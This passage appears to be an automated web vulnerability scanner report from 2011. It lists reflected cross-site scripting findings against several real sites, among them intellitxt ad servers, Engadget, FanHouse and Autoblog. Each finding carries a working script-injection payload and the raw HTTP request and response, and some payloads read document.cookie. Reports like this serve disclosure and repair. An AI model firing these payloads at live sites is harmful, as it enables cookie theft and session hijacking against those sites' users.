GET /intellitxt/front.asp?ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:36:58 GMT Connection: close Content-Length: 10716
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... qoptions={tags:"889.5259.10231"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://electronista.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1c7b2%3balert(1)//fc98b5440bb was submitted in the jscallback parameter. This input was echoed as 1c7b2;alert(1)//fc98b5440bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/advert?ts=1297024724535&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&jscallback=$iTXT.js.callback31c7b2%3balert(1)//fc98b5440bb HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:42 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:37:41 GMT Connection: close Content-Length: 4915
(function(){var nh = new $iTXT.ui.Hook({value: "iphone",uid: "681C2C358D4E49A28512ECFA3DED1626",uidh: "5b94fa4e6337160336acb19c5caaf7ed",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl. ...[SNIP]... XT.glob.track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19827374,'iphone','http://pixel.intellitxt.com/pixel.jsp?id=2776&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback31c7b2;alert(1)//fc98b5440bb();}catch(e){}
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e242d%3balert(1)//f9ad150e83d was submitted in the jscallback parameter. This input was echoed as e242d;alert(1)//f9ad150e83d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1297024724423&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&pagecl=18113&jsoncl=1262&ppc=-1&hn=7&chunkkey=10231:e096018077ddee628d1f0595aa706535:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22We%20have%20noticed%20that%20you%20are%20using%20iPhone%20for%20browsing%20our%20website.%20Would%20you%20like%20to%20browse%20our%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22Toshiba%20has%20sold%20about%20half%20of%20what%20it%20expected%20to%20of%20its%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22in%20Japan%2C%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22Masaaki%20Osumi%2C%20the%20president%20of%20Toshiba%25E2%2580%2599s%20Visual%20Products%20Company.%20Only%20500%20of%20the%2020-inch%2C%20%242%2C490%20set%20were%20sold%20in%20the%20first%20month%20and%20even%20less%20of%20the%20less%20expensive%2012-inch%20model.%20Toshiba%20expected%20to%20move%201%2C000%20of%20each%20model%20during%20their%20first%20month%20of%20sales.%22%7D%5D%7D%2C%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A5%2Cc%3A%22Osumi%20continued%2C%20saying%20the%20company%20needs%20to%20offer%20larger%20sizes%20of%20the%20sets%20in%20order%20to%20boost%20sales.%20Technical%20challenges%20need%20to%20be%20overcome%20first%2C%20however%2C%20before%20the%20company%20can%20do%20so%20in%20the%20second%20half%20of%20the%20year.%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A6%2Cc%3A%22To%20creat&chunk=0&total=2&jscallback=$iTXT.js.callback1e242d%3balert(1)//f9ad150e83d HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Sun, 06 Feb 2011 20:37:42 GMT Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea68b%3balert(1)//0780825101d was submitted in the jscallback parameter. This input was echoed as ea68b;alert(1)//0780825101d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0ea68b%3balert(1)//0780825101d HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:37:43 GMT Content-Length: 11484
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0ea68b;alert(1)//0780825101d({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
1.103. http://electronista.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://electronista.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbb8"-alert(1)-"b15924c4453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0&fbbb8"-alert(1)-"b15924c4453=1 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:37:43 GMT Content-Length: 11465
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... k0","reg":"tx","refurl":"http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889\u003d1","fbbb8"-alert(1)-"b15924c4453":"1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');} ...[SNIP]...
1.104. http://es.engadget.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.engadget.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cedc8"-alert(1)-"2d1d201c850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cedc8"-alert(1)-"2d1d201c850=1 HTTP/1.1 Host: es.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Engadget en espa..ol ...[SNIP]... annel="wb.engadgetsp"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,es.engadget.com"; s_265.mmxgo = true; s_265.prop1="Inactive"; s_265.prop2="Home"; s_265.prop12="http://es.engadget.com/?cedc8"-alert(1)-"2d1d201c850=1"; s_265.prop16="Engadget en espa..ol"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="247";
var s_code=s_265.t();if(s_code)document.write(s_co ...[SNIP]...
1.105. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fantasy.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31dbc"-alert(1)-"afc965ac949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?31dbc"-alert(1)-"afc965ac949=1 HTTP/1.1 Host: fantasy.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f4c8<script>alert(1)</script>e89e8f1416c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000820 Content-Length: 68 Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:33:30 GMT Connection: close
Not Found: /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e302f<script>alert(1)</script>440171cb83a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000805 Content-Length: 68 Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:33:30 GMT Connection: close
Not Found: /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb692<script>alert(1)</script>13f97bad00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /uni0vle.jseb692<script>alert(1)</script>13f97bad00a HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.001252 Content-Length: 63 Vary: Accept-Encoding Date: Sun, 06 Feb 2011 21:46:56 GMT Connection: close
Not Found: /uni0vle.jseb692<script>alert(1)</script>13f97bad00a
1.109. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://golf.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3cc6"-alert(1)-"97283dc744a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f3cc6"-alert(1)-"97283dc744a=1 HTTP/1.1 Host: golf.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.110. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://green.autoblog.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dafda"><script>alert(1)</script>dce0aa22300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?dafda"><script>alert(1)</script>dce0aa22300=1 HTTP/1.1 Host: green.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <link rel="canonical" href="http://green.autoblog.com/?dafda"><script>alert(1)</script>dce0aa22300=1"/> ...[SNIP]...
1.111. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://green.autoblog.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd9f0"-alert(1)-"f846c73bc45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fd9f0"-alert(1)-"f846c73bc45=1 HTTP/1.1 Host: green.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... _265.pageType=""; s_265.linkInternalFilters="javascript:,autobloggreen.com,green.autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Home"; s_265.prop12="http://green.autoblog.com/?fd9f0"-alert(1)-"f846c73bc45=1"; s_265.prop16="Autoblog Green — We Obsessively Cover The Green Scene"; s_265.prop18=""; s_265.prop19=""; s_265.prop20="";
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.112. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe6d6"-alert(1)-"cc4365a87c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
